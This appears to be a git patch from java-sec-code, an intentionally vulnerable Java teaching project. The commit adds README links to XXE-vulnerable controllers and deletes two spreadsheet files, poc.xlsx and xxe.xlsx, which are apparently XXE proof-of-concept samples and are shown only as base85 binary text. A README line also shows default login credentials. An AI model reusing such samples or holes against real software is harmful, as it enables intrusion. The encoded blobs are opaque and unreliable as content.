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

literal 0
HcmV?d00001


From 39f07ff6f0affa2f7cdc993e138ceb81a1f427f6 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 4 Sep 2019 16:37:39 +0800
Subject: [PATCH 059/108] update readme

---
 README.md    |   3 +++
 README_zh.md |   3 +++
 poc.xlsx     | Bin 8334 -> 0 bytes
 xxe.xlsx     | Bin 9049 -> 0 bytes
 4 files changed, 6 insertions(+)
 delete mode 100644 poc.xlsx
 delete mode 100644 xxe.xlsx

diff --git a/README.md b/README.md
index 99e0c939..a594d142 100644
--- a/README.md
+++ b/README.md
@@ -47,6 +47,9 @@ Sort by letter.
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
+- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
+- [xlsxStreamerXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java)
+
 
 
 ## Vulnerability Description
diff --git a/README_zh.md b/README_zh.md
index 86d260bd..62fac015 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -43,6 +43,9 @@ joychou/joychou123
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
+- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
+- [xlsxStreamerXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java)
+
 
 
 ## 漏洞说明
diff --git a/poc.xlsx b/poc.xlsx
deleted file mode 100644
index 19ef11a5e33e97c5c18eec4a00ae0dad3122a4ef..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8334
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
